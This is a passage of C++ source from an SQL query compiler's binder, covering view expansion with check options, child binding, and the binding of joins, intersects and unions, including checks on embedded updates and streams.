if ((groupAttrs) && (groupAttrs->isEmbeddedUpdateOrDelete() || groupAttrs->isStream())) propagateDeleteAndStream(queryTree,groupAttrs); // ************ THE FIRST OF TWO BINDNODE'S ************ // Bind the basic queryTree first (before Rename), for stoi_ security stuff. // Cascade the WCO-ness down to RelExpr::bindSelf which captures predicates. // On this bind, unconditionally we never collect usages. // bindWA->viewCount()++; bindWA->setNameLocListPtr(NULL); // do not collect usages for catman queryTree = queryTree->bindNode(bindWA); if (bindWA->errStatus()) return NULL; bindWA->setNameLocListPtr(saveNameLocList); bindWA->viewCount()--; if (bindWA->errStatus()) return NULL; // if RelRoot has an order by, insert a Logical Sort node below it // and move the order by expr from view root to this sort node. // The view root node is eliminated during transformation/normalization // and the sortlogical node provides a place to 'hold' the order by expr. // During transformation, this sort key is moved from the sortlogical node // to the root node of the query, if there is no explicit order by // specified as part of the query. // SortLogical node is a shortlived node and is eliminated during // the normalization phase. if (viewRoot->hasOrderBy()) { RelExpr * sortNode = new (bindWA->wHeap()) SortLogical(queryTree->child(0)->castToRelExpr(), viewRoot->reqdOrder(), bindWA->wHeap()); sortNode = sortNode->bindNode(bindWA); if (bindWA->errStatus()) return NULL; viewRoot->removeOrderByTree(); viewRoot->reqdOrder().clear(); viewRoot->setChild(0, sortNode); } // Insert a RenameTable node above the view tree. // const NAColumnArray &columns = naTable->getNAColumnArray(); ItemExpr *columnList = new (bindWA->wHeap()) RenameCol(NULL, new (bindWA->wHeap()) ColRefName(columns[0]->getColName(), bindWA->wHeap())); // CollIndex i = 1; for (i = 1; i < naTable->getColumnCount(); i++) columnList = new (bindWA->wHeap()) ItemList(columnList, new (bindWA->wHeap()) RenameCol(NULL, new (bindWA->wHeap()) ColRefName(columns[i]->getColName(), bindWA->wHeap()))); // queryTree = new (bindWA->wHeap()) RenameTable(TRUE/*copy tableName as is*/, queryTree->castToRelExpr(), viewName, columnList, bindWA->wHeap(), TRUE/*isView*/); if (predicate) queryTree->addSelPredTree(predicate); ((RenameTable *) queryTree)->setViewNATable(naTable); // this query used this view appendViewName (viewName.getQualifiedNameObj().getQualifiedNameAsAnsiString().data()); // set a flag for overrride_schema // with the call to bindNode below, only the Rename node will be bound. // Since the view has already been expanded we reset the viewExpansion flag here. //if (overrideSchemaEnabled()) bindWA->getCurrentScope()->setInViewExpansion(inViewExpansion); // ************ THE SECOND OF TWO BINDNODE'S ************ // Bind the view tree whose top is this new RenameTable. // If we are the topmost WCO, then do NOT cascade the incoming predicate! // Collect usages only if CatMan caller requested it. // if (topmostViewWithCheckOption) bindWA->inViewWithCheckOption() = NULL; if (!catmanCollectUsages) bindWA->setNameLocListPtr(NULL); queryTree = queryTree->bindNode(bindWA); bindWA->setNameLocListPtr(saveNameLocList); if (bindWA->errStatus()) return NULL; ((RenameTable *) queryTree)->setViewNATable(NULL); // Genesis 10-980126-5495: // Now that we have the RenameTable's RETDesc, set its view column headings. // We know that the NATable and the RenameTable column lists are in lockstep. 
// const ColumnDescList &columnsRET = *queryTree->getRETDesc()->getColumnList(); CMPASSERT(columns.entries() == naTable->getColumnCount() && columns.entries() == columnsRET.entries()); for (i = 0; i < naTable->getColumnCount(); i++) { columnsRET[i]->setHeading(columns[i]->getHeading()); } // If it's a view that is WITH CHECK OPTION, and this is an UPDATE/INSERT, // bind/transform/normalize the view predicate and place it as a constraint // on the base table's TableDesc. This is equivalent to the default kind // of check clause, WITH CASCADED CHECK OPTION, which is all we need provide // up through Intermediate-Level SQL'92. // // (ANSI says that all CHECK OPTION views must be updatable (11.19 SR12) // which means it references exactly one updatable view or, at bottom, // exactly one base table (7.9 SR12). // MP guarantees that all CHECK OPTION views must be protection views, and // all pviews reference exactly one base table.) // // Notice that since (Genesis 10-990518-8420) we now bind and collect the // view preds in bindSelf -- i.e. pushed down below here -- // only this topmost WCO can set up the constraint(s). // Thus we have lost the nice, but not mandated by Ansi, ability to specify // which cascaded-down-to view causes which exact pred violation -- // i.e. error EXE_CHECK_OPTION_VIOLATION_CASCADED (8104) // no longer appears, only EXE_CHECK_OPTION_VIOLATION (8105). if (topmostViewWithCheckOption) { CheckConstraint *constraint = NULL; ItemExpr *viewCheckPred = NULL; if (bindWA->predsOfViewWithCheckOption().entries()) { constraint = new (bindWA->wHeap()) CheckConstraint(viewName.getQualifiedNameObj(), // this view name naTable->getTableName(), // no parsing needed bindWA->wHeap()); viewCheckPred = bindWA->predsOfViewWithCheckOption().rebuildExprTree(); } // if at least one predicate exists in the view or what underlies it if (constraint) { RelExpr *underlyingTableOrView = viewRoot->child(0); RETDesc *saveRETDesc = bindWA->getCurrentScope()->getRETDesc(); RETDesc *underlyingRETDesc = underlyingTableOrView->getRETDesc(); bindWA->getCurrentScope()->setRETDesc(underlyingRETDesc); CMPASSERT(underlyingTableOrView); CMPASSERT(underlyingTableOrView->getOperatorType() == REL_RENAME_TABLE || underlyingTableOrView->getOperatorType() == REL_SCAN); ItemExpr *constraintPred = bindCheckConstraint(bindWA, constraint, naTable, catmanCollectUsages, viewCheckPred); if (constraintPred) queryTree->getScanNode()->getTableDesc()->addCheckConstraint( bindWA, naTable, // topmost WCO view constraint, // this view name constraintPred); bindWA->getCurrentScope()->setRETDesc(saveRETDesc); } // at least one predicate exists bindWA->inViewWithCheckOption() = NULL; bindWA->predsOfViewWithCheckOption().clear(); } // topmost WCO view // QSTUFF bindWA->setInViewExpansion(inViewExpansion); bindWA->getUpdateToScanValueIds().clear(); // QSTUFF return queryTree; } // BindWA::bindView() // ----------------------------------------------------------------------- // member functions for class RelExpr // ----------------------------------------------------------------------- void RelExpr::bindChildren(BindWA *bindWA) { // Increment the trigger recursion counter. if (getInliningInfo().isTriggerRoot()) getInliningInfo().getTriggerObject()->incRecursionCounter(); // TSJ's flow their data from left child to right child; // some can also share binding scope column info from left to right. 
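  // For example (illustrative; this is the kind of illegal query the
  // Binder-internals / TEST028 case mentioned below refers to):
  //    SELECT * FROM T1, (SELECT T1.A FROM T2) X
  // The derived table X is a sibling of T1, not a TSJ right child, so it must
  // not see T1's columns; clearing the current RETDesc before binding the
  // non-first child of a non-TSJ operator is what enforces that.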
Int32 arity = getArity(); for (Int32 i = 0; i < arity; i++) { if (child(i)) { // If doing a non-first child and the operator is // NOT one in which values/names can flow from one scope // the sibling scope, then we must clear the current RETDesc // (so as to disallow the illegal query in the Binder internals document, // section 1.5.3, also in TEST028). // if (i && !getOperator().match(REL_ANY_TSJ)) bindWA->getCurrentScope()->setRETDesc(NULL); child(i) = child(i)->bindNode(bindWA); if (bindWA->errStatus()) return; } } synthPropForBindChecks(); // QSTUFF // Decrement the trigger recursion counter. if (getInliningInfo().isTriggerRoot()) getInliningInfo().getTriggerObject()->decRecursionCounter(); } // RelExpr::bindChildren() void RelExpr::synthPropForBindChecks() // QSTUFF { // synthesis of delete and stream properties to // allow for binder checks. We assume that all // operators are rejected when binding the respective node // -- except UNIONS -- in which more than one child has // has any of those attributes. If both attributes are // specified both must be specified for the same // result-set/base table. for (Int32 j = 0; j < getArity(); j++) { if (child(j)) { if (child(j)->getGroupAttr()->isStream()) { getGroupAttr()->setStream(TRUE); if (child(j)->getGroupAttr()->isSkipInitialScan()) getGroupAttr()->setSkipInitialScan(TRUE); } if (child(j)->getGroupAttr()->isEmbeddedUpdateOrDelete() || child(j)->getGroupAttr()->isEmbeddedInsert()) getGroupAttr()->setEmbeddedIUD( child(j)->getGroupAttr()->getEmbeddedIUD()); if (child(j)->getGroupAttr()->reorderNeeded()) getGroupAttr()->setReorderNeeded(TRUE); } } } RelExpr *RelExpr::bindSelf(BindWA *bindWA) { // create the group attributes // if (NOT getGroupAttr()) setGroupAttr(new (bindWA->wHeap()) GroupAttributes); // // Detach the item expression tree for the predicate, bind it, convert it to // a ValueIdSet, and attach it to the RelExpr node. // ItemExpr *predTree = removeSelPredTree(); if (predTree) { bindWA->getCurrentScope()->context()->inWhereClause() = TRUE; predTree->convertToValueIdSet(selectionPred(), bindWA, ITM_AND); bindWA->getCurrentScope()->context()->inWhereClause() = FALSE; if (bindWA->errStatus()) return this; // If this is an embedded insert, then subquery predicates are not // allowed. // For example: To handle this query and issue an error stating // subqueries are not allowed in embedded inserts // // select a from (insert into t901t01 values(22,22,222))t(a,b,c) // where t.a IN (select m from t901t03 where t901t03.m = 77); if (getGroupAttr()->isEmbeddedInsert()) { if (!selectionPred().isEmpty() && selectionPred().containsSubquery()) { *CmpCommon::diags() << DgSqlCode(-4337); bindWA->setErrStatus(); return this; } } // Genesis 10-990518-8420. if (bindWA->inViewWithCheckOption()) bindWA->predsOfViewWithCheckOption() += selectionPred(); } // ++MV // Bind the uniqueColumnsTree expression. // ItemExpr *uniqueColumnsTree = removeUniqueColumnsTree(); if (uniqueColumnsTree) { uniqueColumnsTree-> convertToValueIdSet(getUniqueColumns(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) return this; } // --MV // set flag here if an Insert/Update/Delete operation is below this node if( bindWA->isBindingIUD() ) { setSeenIUD(); } // // This mechanism is used to set InliningInfo flags on an entire subtree. getInliningInfo().setFlags(bindWA->getInliningInfoFlagsToSetRecursivly()); // // Add the values in the Outer References Set as the input values // that must be supplied to this RelExpr. 
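  // For example (illustrative): while binding the subquery in
  //    SELECT * FROM T1 WHERE T1.A IN (SELECT B FROM T2 WHERE T2.C = T1.D)
  // the reference to T1.D is an outer reference of the inner scope; recording
  // it as a characteristic input is what lets the outer value be supplied to
  // this RelExpr at execution time.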
// getGroupAttr()->addCharacteristicInputs(bindWA->getCurrentScope()->getOuterRefs()); markAsBound(); return this; } // RelExpr::bindSelf() RelExpr *RelExpr::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } bindChildren(bindWA); if (bindWA->errStatus()) return this; return bindSelf(bindWA); } RETDesc *RelExpr::getRETDesc() const { if (RETDesc_) return RETDesc_; if (getArity() == 1) return child(0)->getRETDesc(); else return NULL; } // When there is a view atop a view atop a ... atop a single base table, // this will follow the chain of RenameTable-RelRoot-... down till it finds // the bottom, the single base table's Scan node. // // This method does check to ensure exactly one single base table. // Scan *RelExpr::getScanNode(NABoolean assertExactlyOneScanNode) const { RelExpr *result = (RelExpr *)this; // cast away constness, big whoop while (result) { if ((result->getOperatorType() == REL_SCAN) || (result->getOperatorType() == REL_HBASE_ACCESS)) break; if (result->getArity() > 1) { if (assertExactlyOneScanNode) { CMPASSERT(result->getArity() <= 1); } else return NULL; } result = result->child(0); } if (assertExactlyOneScanNode) { CMPASSERT(result); } return (Scan *)result; } Scan *RelExpr::getLeftmostScanNode() const { RelExpr *result = (RelExpr *)this; // cast away constness, big whoop while (result) { if (result->getOperatorType() == REL_SCAN) break; result = result->child(0); } return (Scan *)result; } // QSTUFF // We use this method for finding the scan node of an updatable view. // This may either be a base table scan or a RenameTable node inserted // by a previous index expansion. RelExpr *RelExpr::getViewScanNode(NABoolean isTopLevelUpdateInView) const { RelExpr *result = (RelExpr *)this; // cast away constness, big whoop while (result) { if (result->getOperatorType() == REL_SCAN) break; if (result->getOperatorType() == REL_RENAME_TABLE && ((RenameTable *)result)->isView()) break; result = result->child(0); } return result; } // ----------------------------------------------------------------------- // getFirstIUDNode // // Return the first node that is an insert, update, or delete. // Only search down left side from the starting point (currentNode) // // If an IUD node is not found, return NULL // ----------------------------------------------------------------------- GenericUpdate * Join::getFirstIUDNode(RelExpr *currentNode) { while(currentNode) { if( currentNode->getOperator().match(REL_ANY_GEN_UPDATE)) { break; } currentNode = currentNode->child(0); } return (GenericUpdate*)currentNode; } // ----------------------------------------------------------------------- // member functions for class Join // // When we implement "JOIN USING (column list)", we need to: ## // - disallow both NATURAL and USING in the same query (syntax err in Parser?) // - ensure that the named USING cols are indeed common cols // - coalesce common cols for USING just as we do for NATURAL, // including ensuring that common cols are marked as referenced // (as done in joinCommonColumns) // ----------------------------------------------------------------------- RelExpr *Join::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Do not support for general NEO users. 
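  // In outline, the COMP_BOOL_192 rewrite done just below is (illustrative):
  //    T1 FULL JOIN T2 ON p
  //      ==>  (T1 LEFT JOIN T2 ON p)
  //           UNION ALL
  //           (T1 RIGHT JOIN T2 ON p, renamed "ALJ<uniq>", filtered by
  //            IS NULL on a null-instantiated constant)
  // so the second branch keeps only the right rows that found no left match
  // (the anti-join part), avoiding duplicates with the left-join branch.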
if ( (getOperatorType() == REL_FULL_JOIN) && (CmpCommon::getDefault(COMP_BOOL_192) == DF_ON) ) { RelExpr *leftJoin = this; leftJoin->setOperatorType(REL_LEFT_JOIN); RelExpr *antiJoin = leftJoin->copyTree(bindWA->wHeap()); antiJoin->setOperatorType(REL_RIGHT_JOIN); NAString leftName("ALJ", bindWA->wHeap()); // Make it unique. // leftName += bindWA->fabricateUniqueName(); RelExpr *rename = new (bindWA->wHeap()) RenameTable(antiJoin, leftName); RelExpr *unionAll = new (bindWA->wHeap()) Union(leftJoin, rename); unionAll->bindNode(bindWA); if (bindWA->errStatus()) return this; // Make sure there is at least one null instantiated // value that is suitable for use as a filter. // To be suitable, it must be null instantiated and // it's child must not be nullable. We want to filter // the NULL that are a result of null instantiation, not // original null values. // ItemExpr *cval = new (bindWA->wHeap()) SystemLiteral(1); cval->bindNode(bindWA); if (bindWA->errStatus()) return this; // Null instantiate the value. // ValueId niCval = cval->getValueId().nullInstantiate(bindWA, TRUE); // Add it to the RETDesc of the Join. // ColRefName cvalName("", bindWA->wHeap()); antiJoin->getRETDesc()->addColumn(bindWA, cvalName , niCval, USER_COLUMN); // Add it to the list of null instantiated outputs. // ((Join *)antiJoin)->nullInstantiatedOutput().insert(niCval); ItemExpr *nullCheck = niCval.getItemExpr(); CMPASSERT(nullCheck); ItemExpr *filter = new (bindWA->wHeap()) UnLogic(ITM_IS_NULL, nullCheck ); filter->bindNode(bindWA); if (bindWA->errStatus()) return this; // Add filter to Join // antiJoin->selectionPred() += filter->getValueId(); return unionAll; } Join *saveInJ = bindWA->getCurrentScope()->context()->inJoin(); bindWA->getCurrentScope()->context()->inJoin() = this; NABoolean savedPrivSetting = FALSE; // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // MV logging push-down if( getInliningInfo().isDrivingMvLogInsert() ) { GenericUpdate *rightSideIUD = getFirstIUDNode(this->child(1)); if( NULL != rightSideIUD ) { TableDesc *tdesc = rightSideIUD->getTableDesc(); CMPASSERT(tdesc); const NATable *table = tdesc->getNATable(); // only for MV logs if( ExtendedQualName::IUD_LOG_TABLE == table->getSpecialType() ) { updateTableDesc_ = tdesc; updateSelectValueIdMap_ = new (bindWA->wHeap()) ValueIdMap(rightSideIUD->updateToSelectMap()); } } } // Controlled availability of Full Outer Join support // The COMP_BOOL_199 must be removed when full outer join // becomes general availability. // Full outer joins are not currently supported. // But can enabled by setting COMP_BOOL_199 to ON. if ((getOperatorType() == REL_FULL_JOIN && (CmpCommon::getDefault(COMP_BOOL_199) == DF_OFF)) || //OR (getOperatorType() == REL_UNION_JOIN )){ // 3022 Feature not yet supported *CmpCommon::diags() << DgSqlCode(-3022) << DgString0( (getOperatorType() == REL_FULL_JOIN) ? "FULL OUTER JOIN" : "UNION JOIN"); bindWA->setErrStatus(); return this; } // // Bind the ON clause of the join. // RelExpr *leftRelExpr = child(0).getPtr(); RelExpr *rightRelExpr = child(1).getPtr(); RETDesc *leftTable = child(0)->getRETDesc(); RETDesc *rightTable = child(1)->getRETDesc(); ItemExpr *joinPredx; if (isNaturalJoin()) { // since the common column references need fetch histograms, the where // flag is set here so that when we call markAsReferencedColumn() // in the joinCommoncolumns() method it would set the common // columns as refenced by looking a the inWhereCaluse_ flag. 
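  // For example (illustrative): in
  //    SELECT * FROM T1 NATURAL JOIN T2
  // where T1 and T2 share a column C, joinCommonColumns() builds the implicit
  // predicate T1.C = T2.C here, and coalesceCommonColumns() below exposes a
  // single column C in the join's RETDesc.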
NABoolean orig = bindWA->getCurrentScope()->context()->inWhereClause(); bindWA->getCurrentScope()->context()->inWhereClause() = TRUE; joinPredx = joinCommonColumns(leftRelExpr, rightRelExpr, bindWA); bindWA->getCurrentScope()->context()->inWhereClause() = orig; } else joinPredx = removeJoinPredTree(); if (joinPredx) { ItemExpr *saveInJP = bindWA->getCurrentScope()->context()->inJoinPred(); bindWA->getCurrentScope()->context()->inJoinPred() = joinPredx; RETDesc preJoinResult; preJoinResult.addColumns(bindWA, *leftTable); preJoinResult.addColumns(bindWA, *rightTable); bindWA->getCurrentScope()->setRETDesc(&preJoinResult); joinPredx->convertToValueIdSet(joinPred(), bindWA, ITM_AND); bindWA->getCurrentScope()->context()->inJoinPred() = saveInJP; if (bindWA->errStatus()) return this; } // // Create the output list. // The TRUE's in the nullInstantiate() force a Cast expression to be set up, // as required by the Normalizer. // NABoolean newTables = TRUE; ValueIdList &nullOutputList = nullInstantiatedOutput(); ValueIdList &nullOutputForRightJoinList = nullInstantiatedForRightJoinOutput(); switch(getOperatorType()) { case REL_LEFT_JOIN: leftTable = new (bindWA->wHeap()) RETDesc(bindWA, *leftTable); rightTable = rightTable->nullInstantiate(bindWA, TRUE, nullOutputList); break; case REL_RIGHT_JOIN: leftTable = leftTable->nullInstantiate(bindWA, TRUE, nullOutputList); rightTable = new (bindWA->wHeap()) RETDesc(bindWA, *rightTable); break; case REL_FULL_JOIN: case REL_UNION_JOIN: { leftTable = leftTable->nullInstantiate(bindWA, TRUE, nullOutputForRightJoinList); rightTable = rightTable->nullInstantiate(bindWA, TRUE, nullOutputList); // comp_bool_198 = 'on' enables FullOuter transformation // inner, left or right if (CmpCommon::getDefault(COMP_BOOL_198) == DF_OFF) //don't enable FOJ transformation { ItemExpr * instNull = NULL; CollIndex index = 0; // disable the FOJ Transformation. 
for (index = 0; index < nullInstantiatedOutput().entries(); index++) { instNull = nullInstantiatedOutput()[index].getItemExpr(); CMPASSERT(instNull->getOperatorType() == ITM_INSTANTIATE_NULL); ((InstantiateNull *)instNull)->NoCheckforLeftToInnerJoin = TRUE; } // endfor instNull = NULL; for (index = 0; index < nullInstantiatedForRightJoinOutput().entries(); index++) { instNull = nullInstantiatedForRightJoinOutput()[index].getItemExpr(); CMPASSERT(instNull->getOperatorType() == ITM_INSTANTIATE_NULL); ((InstantiateNull *)instNull)->NoCheckforLeftToInnerJoin = TRUE; } // endfor } // env "ENABLE_FOJ_TRANSFORMATION" break; } case REL_JOIN: default: newTables = FALSE; break; } RETDesc *resultTable = new (bindWA->wHeap()) RETDesc(bindWA); Int32 rowSet = (child(0)->getOperatorType() == REL_RENAME_TABLE) && (child(0)->child(0)->getOperatorType() == REL_UNPACKROWS) && (child(1)->getOperatorType() == REL_ROOT); if (NOT isNaturalJoin()) { if ((!rowSet) && (getOperatorType() != REL_TSJ_FLOW)) { resultTable->addColumns(bindWA, *leftTable); } // ++MV -- bug fixing for semi-joins if (!isSemiJoin()) { resultTable->addColumns(bindWA, *rightTable); } // --MV -- bug fixing for semi-joins } else { coalesceCommonColumns(bindWA, getOperatorType(), *leftTable, *rightTable, *resultTable); if (bindWA->errStatus()) return this; } setRETDesc(resultTable); bindWA->getCurrentScope()->setRETDesc(resultTable); // QSTUFF NAString fmtdList(bindWA->wHeap()); LIST(TableNameMap*) xtnmList(bindWA->wHeap()); bindWA->getTablesInScope(xtnmList, &fmtdList); if ((child(0)->getGroupAttr()->isStream()) && (child(1)->getGroupAttr()->isStream())){ bindWA->getTablesInScope(xtnmList, &fmtdList); *CmpCommon::diags() << DgSqlCode(-4158) << DgString0(fmtdList); bindWA->setErrStatus(); return this; } // Disallowing joins for EMBEDDED...INSERT // if (getGroupAttr()->isEmbeddedInsert() && !isTSJForWrite() // the tsjForWrite flag is set for // those joins which are created by // the Binder during inlining (eg. IndexMaintanence) // Here we only want to disable user specified joins // and not joins introduced as part of inlining. ){ *CmpCommon::diags() << DgSqlCode(-4336) << DgString0(fmtdList) << DgString1(getGroupAttr()->getOperationWithinGroup()); bindWA->setErrStatus(); return this; } if ( ((child(0)->getGroupAttr()->isEmbeddedUpdateOrDelete()) && (child(1)->getGroupAttr()->isEmbeddedUpdateOrDelete())) || ((child(0)->getGroupAttr()->isEmbeddedInsert()) && (child(1)->getGroupAttr()->isEmbeddedInsert())) || (bindWA->isEmbeddedIUDStatement()) ) { NAString type0,type1; if (child(0)->getGroupAttr()->isEmbeddedUpdate()) type0 = "UPDATE"; else { if (child(0)->getGroupAttr()->isEmbeddedInsert()) type0 = "INSERT"; else type0 = "DELETE"; } if (child(1)->getGroupAttr()->isEmbeddedUpdate()) type1 = "UPDATE"; else { if (child(1)->getGroupAttr()->isEmbeddedInsert()) type1 = "INSERT"; else type1 = "DELETE"; } *CmpCommon::diags() << DgSqlCode(-4175) << DgString0(fmtdList) << DgString1(type0) << DgString2(type1); bindWA->setErrStatus(); return this; } if ((child(0)->getGroupAttr()->isEmbeddedUpdateOrDelete() || child(0)->getGroupAttr()->isStream()) && (child(1)->getGroupAttr()->isEmbeddedUpdateOrDelete() || child(1)->getGroupAttr()->isStream())){ *CmpCommon::diags() << DgSqlCode(-4176) << DgString0(fmtdList) << (getGroupAttr()->isEmbeddedUpdate() ? 
DgString1("UPDATE"):DgString1("DELETE")); bindWA->setErrStatus(); return this; } if (getOperatorType() == REL_LEFT_JOIN){ if (child(1)->getGroupAttr()->isEmbeddedUpdateOrDelete()){ *CmpCommon::diags() << DgSqlCode(-4156) << DgString0(fmtdList) << (child(1)->getGroupAttr()->isEmbeddedUpdate() ? DgString1("UPDATE"):DgString1("DELETE")); bindWA->setErrStatus(); return this; } if (child(1)->getGroupAttr()->isStream()){ *CmpCommon::diags() << DgSqlCode(-4157) << DgString0(fmtdList); bindWA->setErrStatus(); return this; } } if (getOperatorType() == REL_RIGHT_JOIN){ if (child(0)->getGroupAttr()->isEmbeddedUpdateOrDelete()){ *CmpCommon::diags() << DgSqlCode(-4164) << DgString0(fmtdList) << (child(0)->getGroupAttr()->isEmbeddedUpdate() ? DgString1("UPDATE"):DgString1("DELETE")); bindWA->setErrStatus(); return this; } if (child(0)->getGroupAttr()->isStream()){ *CmpCommon::diags() << DgSqlCode(-4165) << DgString0(fmtdList); bindWA->setErrStatus(); return this; } } // we need to move stream and nested updates to the // left to ensure correct execution. This causes the statement // to be rejected if the user specified join_order_by_user and // the query must be reordered if (child(1)->getGroupAttr()->isStream() || child(1)->getGroupAttr()->isEmbeddedUpdateOrDelete()){ getGroupAttr()->setReorderNeeded(TRUE); } // QSTUFF if (newTables) { delete leftTable; delete rightTable; } bindWA->getCurrentScope()->context()->inJoin() = saveInJ; if (getOperatorType() == REL_TSJ){ //Using rowsets in a predicate with embedded update/delete results //in a NestedJoin subtree after Normalization.This NestedJoin subtree //has embedded update/delete as the right child, which is not allowed //during optimization. Here we try to disallow this usage at Binding //when a REL_TSJ subtree has rowsets as the left child and embedded //update/delete as the right child. An error message[4123] is signaled. if (rowSet && getGroupAttr()->isEmbeddedUpdateOrDelete()){ *CmpCommon::diags() << DgSqlCode(-4213); bindWA->setErrStatus(); return this; } } // transfer rowsetRowCountArraySize from HostArrayWA to this node. if (bindWA->getHostArraysArea() && isRowsetIterator()) setRowsetRowCountArraySize(bindWA->getHostArraysArea()->getRowsetRowCountArraySize()); // Bind the base class. 
// return bindSelf(bindWA); } // Join::bindNode() //++MV // This function builds the BalueIdMap that is used for translating the required // sort key to the right child sort key and backwards void Join::BuildRightChildMapForLeftJoin() { ValueIdMap &map = rightChildMapForLeftJoin(); for (CollIndex j = 0; j < nullInstantiatedOutput().entries(); j++) { ValueId instNullId, rightChildId; instNullId = nullInstantiatedOutput_[j]; assert(instNullId.getItemExpr()->getOperatorType() == ITM_INSTANTIATE_NULL); // Access the operand of the InstantiateNull rightChildId = (((InstantiateNull *)(instNullId.getItemExpr()))->getExpr()->getValueId()); map.addMapEntry(instNullId, rightChildId); } } //--MV //++MV // This function builds the ValueIdMap that is used for translating the // required // sort key to the left child sort key and backwards void Join::BuildLeftChildMapForRightJoin() { ValueIdMap &map = leftChildMapForRightJoin(); for (CollIndex j = 0; j < nullInstantiatedForRightJoinOutput().entries(); j++) { ValueId instNullId, leftChildId; instNullId = nullInstantiatedForRightJoinOutput_[j]; assert(instNullId.getItemExpr()->getOperatorType() == ITM_INSTANTIATE_NULL); // Access the operand of the InstantiateNull leftChildId = (((InstantiateNull *)(instNullId.getItemExpr()))->getExpr()->getValueId()); map.addMapEntry(instNullId, leftChildId); } } //--MV // ----------------------------------------------------------------------- // member functions for class Intersect // ----------------------------------------------------------------------- // LCOV_EXCL_START - cnu RelExpr *Intersect::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // Check that there are an equal number of select items on both sides. // const RETDesc &leftTable = *child(0)->getRETDesc(); const RETDesc &rightTable = *child(1)->getRETDesc(); if (leftTable.getDegree() != rightTable.getDegree()) { // 4014 The operands of an intersect must be of equal degree. *CmpCommon::diags() << DgSqlCode(-4014); bindWA->setErrStatus(); return this; } // Join the columns of both sides. This is wrong semantics tho! ## // *CmpCommon::diags() << DgSqlCode(-3022) // ## INTERSECT not yet supported << DgString0("INTERSECT"); // ## bindWA->setErrStatus(); // ## if (bindWA->errStatus()) return NULL; // ## // ItemExpr *predicate = intersectColumns(leftTable, rightTable, bindWA); RelExpr *join = new (bindWA->wHeap()) Join(child(0)->castToRelExpr(), child(1)->castToRelExpr(), REL_JOIN, predicate); // Bind the join. // join = join->bindNode(bindWA)->castToRelExpr(); if (bindWA->errStatus()) return join; // Change the output of the join to just the left side. 
// delete join->getRETDesc(); join->setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA, leftTable)); bindWA->getCurrentScope()->setRETDesc(join->getRETDesc()); // QSTUFF NAString fmtdList1(bindWA->wHeap()); LIST(TableNameMap*) xtnmList1(bindWA->wHeap()); NAString fmtdList2(bindWA->wHeap()); LIST(TableNameMap*) xtnmList2(bindWA->wHeap()); leftTable.getTableList(xtnmList1, &fmtdList1); rightTable.getTableList(xtnmList2, &fmtdList2); if (child(0)->getGroupAttr()->isStream() && child(1)->getGroupAttr()->isStream()){ *CmpCommon::diags() << DgSqlCode(-4159) << DgString0(fmtdList1) << DgString1(fmtdList2); bindWA->setErrStatus(); return this; } // Needs to be removed when supporting get_next for INTERSECT if (getGroupAttr()->isEmbeddedUpdateOrDelete()) { *CmpCommon::diags() << DgSqlCode(-4160) << DgString0(fmtdList1) << DgString1(fmtdList2) << (child(0)->getGroupAttr()->isEmbeddedUpdate() ? DgString2("UPDATE"):DgString2("DELETE")) << (child(1)->getGroupAttr()->isEmbeddedUpdate() ? DgString3("UPDATE"):DgString3("DELETE")); bindWA->setErrStatus(); return this; } // QSTUFF return join; } // Intersect::bindNode() // LCOV_EXCL_STOP // ----------------------------------------------------------------------- // member functions for class Union // ----------------------------------------------------------------------- RelExpr *Union::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // // Bind the conditional expression. // ItemExpr *condExprTree = removeCondExprTree(); if (condExprTree) { condExprTree->convertToValueIdList(condExpr(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) { return NULL; } } // // Bind the triggered action exception expression. // ItemExpr *trigExprTree = removeTrigExceptExprTree(); if (trigExprTree) { // the assumption in the binder (in Union::addValueIdUnion) is that // unionMap_ count is always less than or equal to one but triggers // code might increment this number during binding because of // recursive triggers or triggers that are used more than once // in the statement. This check fixes the unionMap_ for triggers. if ((unionMap_ != NULL) && (unionMap_->count_ > 1)) { unionMap_->count_--; unionMap_ = new (CmpCommon::statementHeap()) UnionMap; } trigExprTree->convertToValueIdList(trigExceptExpr(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) { return NULL; } } AssignmentStArea *assignArea = NULL; // We store a pointer to this Union node in the assignment statements area. // This is needed for compound statements project, in particular when we have // assignment statements within an IF statement if (getUnionForIF()) { assignArea = bindWA->getAssignmentStArea(); setPreviousIF(assignArea->getCurrentIF()); assignArea->setCurrentIF(this); } // // Bind the child nodes. // bindWA->getCurrentScope()->context()->inUnion() = TRUE; currentChild() = 0; child(0) = child(0)->bindNode(bindWA); if (bindWA->errStatus()) return this; // If we have assignment statements of compound statements, we need to get rid // of the value ids generated while binding the first child. 
Also, we create a // list of the value ids of the variables that are on the left side of a SET // statement if (getUnionForIF() && leftList() && assignArea) { assignArea->removeLastValueIds(leftList(), this); } if (getCondUnary()) { CollIndex leftDegree = child(0)->getRETDesc()->getDegree(); ItemExpr *tupleExpr = new (bindWA->wHeap()) ConstValue(); for (CollIndex i=0; i+1<leftDegree; i++) { ItemExpr *con = new (bindWA->wHeap()) ConstValue(); ItemList *list = new (bindWA->wHeap()) ItemList(con, tupleExpr); tupleExpr = list; } RelExpr *tuple = new (bindWA->wHeap()) Tuple(tupleExpr); // create the selection predicate (1=0) for the Tuple node ItemExpr *predicate = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, new (bindWA->wHeap()) ConstValue(1), new (bindWA->wHeap()) ConstValue(0)); tuple->addSelPredTree(predicate); RelExpr *tupleRoot = new (bindWA->wHeap()) RelRoot(tuple); setChild (1, tupleRoot); } if (child(1)) { if (!(child(1)->getOperator().match(REL_ANY_TSJ))) { bindWA->getCurrentScope()->setRETDesc(NULL); } currentChild() = 1; child(1) = child(1)->bindNode(bindWA); if (bindWA->errStatus()) return this; // If we have assignment statements of compound statements, // we need to get rid of the value ids generated while binding // the second child if (getUnionForIF() && rightList() && assignArea) { assignArea->removeLastValueIds(rightList(), this); } } // check for & warn against UNIONs that have 